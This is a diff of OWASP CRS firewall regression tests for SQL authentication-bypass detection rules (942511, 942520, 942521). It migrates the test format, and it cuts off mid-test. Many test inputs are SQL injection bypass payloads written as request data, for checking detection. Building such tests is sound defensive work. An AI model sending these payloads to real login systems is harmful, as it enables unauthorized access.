text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - log_contains: id "942511" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + expect_ids: [942511] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml index 79f614b..be7dd03 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942520.yaml 
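Review bot: Test 1's desc, `SQLi bypass detected: quotes`, reads as a positive expectation, but the case sends backticks and asserts `no_expect_ids: [942511]`; it is the negative counterpart of the 942510 test, so label it as such, e.g. `desc: "Negative test: backticks must not trigger the quote rule"`. Test 2 covers single quotes only; since the desc says quotes generally, a case with a double-quoted value (`uri: "/get?%22bla%22"`) would confirm whether 942511 is meant to match both forms, if it is.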
@@ -2,409 +2,408 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.0/4" - enabled: true - name: 942520.yaml +rule_id: 942520 tests: - - test_title: 942520-1 + - test_id: 1 desc: "Detects basic SQL auth bypass with 'is not something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20not-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20not-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 2 desc: "Negative test: 'is notes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'is%20notes" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'is%20notes" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 3 desc: "Detects basic SQL auth bypass with 'not like something'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - 
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20like%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20like%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 4 desc: "Detects basic SQL auth bypass with 'not glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 5 desc: "Detects basic SQL auth bypass with 'not like glob'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=id'not%20glob-id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=id'not%20glob-id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 6 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'|email-- - data: "var=x'%7Cemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'|email-- + data: "var=x'%7Cemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 7 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'-email-- - data: "var=x'-email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'-email-- + data: "var=x'-email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 8 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - 
headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'+email-- (there seem to be a bug with double encoding in tests) - data: "var=x'%252Bemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'+email-- (there seem to be a bug with double encoding in tests) + data: "var=x'%252Bemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 9 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'^email-- - data: "var=x'%5Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'^email-- + data: "var=x'%5Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 10 desc: "Nagive test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 
x'@email-- - data: "var=x'%40email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'@email-- + data: "var=x'%40email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 11 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'&email-- - data: "var=x'%26email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'&email-- + data: "var=x'%26email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 12 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'email-- - data: "var=x'%3Eemail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + 
port: 80 + uri: "/post" + # x'>email-- + data: "var=x'%3Eemail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 14 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'=email-- - data: "var=x'%3Demail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'=email-- + data: "var=x'%3Demail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 15 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'/email-- - data: "var=x'%2Femail--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'/email-- + data: "var=x'%2Femail--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 16 desc: "Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'%email-- - data: "var=x'%25email--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'%email-- + data: "var=x'%25email--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 17 desc: "Negative test: Detects basic SQL auth bypass with binary operators" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # x'~email-- - data: "var=x'~email--" - version: HTTP/1.0 - output: - no_log_contains: id "942520" - - test_title: 942520-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # x'~email-- + data: "var=x'~email--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942520] + - test_id: 18 desc: "Detects basic SQL auth bypass with mod" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=x'%20mod%20id--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=x'%20mod%20id--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 19 desc: "Detects basic SQL auth bypass with: sounds like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='sounds%20like%20rowid--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='sounds%20like%20rowid--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 20 desc: "Bypass with a comment" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%2F**%2F*2--" - version: HTTP/1.0 - output: - log_contains: id "942520" - - test_title: 942520-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%2F**%2F*2--" + version: HTTP/1.0 + output: + log: + expect_ids: [942520] + - test_id: 21 desc: "Integration test: 942521 blocks foo'or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS 
test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo'or'oof" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942520-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo'or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 22 desc: "Integration test: 942522 blocks foo\\''or'oof" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=foo%5c''or'oof" - version: HTTP/1.0 - output: - log_contains: id "942522" - - test_title: 942520-23 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=foo%5c''or'oof" + version: HTTP/1.0 + output: + log: + expect_ids: [942522] + - test_id: 23 desc: "Detect auth bypass email=' is not?--" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20is%20not%3F--" - version: HTTP/1.0 - output: - log_contains: id "942520" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "email=%27%20is%20not%3F--"
+ version: HTTP/1.0
+ output:
+ log:
+ expect_ids: [942520]
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
index 4a11928..29eec39 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942521.yaml
@@ -2,410 +2,409 @@ meta: author: "terjanq, Franziska Bühler, azurit" description: "Detects basic SQL authentication bypass attempts 4.1/4" - enabled: true - name: 942521.yaml +rule_id: 942521 tests: - - test_title: 942521-1 + - test_id: 1 desc: "Detects the most basic authentication bypass with 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or'a" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or'a" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 2 desc: "Detects basic SQLite authentication bypass with 'or?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=a'or?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=a'or?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 3 desc: "False-positive: Detects or-based authentication bypass" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=is%20this%20your%20parents'%20or%20yours?" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=is%20this%20your%20parents'%20or%20yours?" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 4 desc: "Detects basic SQL auth bypass and-based" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'and%20id%20is%20not?--" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'and%20id%20is%20not?--" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 5 desc: "False-positve: is it your parents' or yours" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=it%20is%20your%20parents'%20and%20yours" - version: HTTP/1.0 - output: - log_contains: id "942521" - - test_title: 942521-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=it%20is%20your%20parents'%20and%20yours" + version: HTTP/1.0 + output: + log: + expect_ids: [942521] + - test_id: 6 desc: "Negative test: bob's or alice's" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=bob's%20or%20alice's" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=bob's%20or%20alice's" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 7 desc: "Negative test: mother or daugher" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=mother%20or%20daughter" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=mother%20or%20daughter" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 8 desc: "Negative test: 'oreo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 
Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='oreo" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='oreo" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 9 desc: "Negative test: 'fork" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='fork" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='fork" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 10 desc: "Negative test: 'for" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='%20for" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='%20for" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 11 desc: "Negative test: ''or" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 12 desc: "Negative test: 'books' or 'applles'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=''or" - version: HTTP/1.0 - output: - no_log_contains: id "942521" - - test_title: 942521-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=''or" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942521] + - test_id: 13 desc: "Negative test: bob's presentation's 'or'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
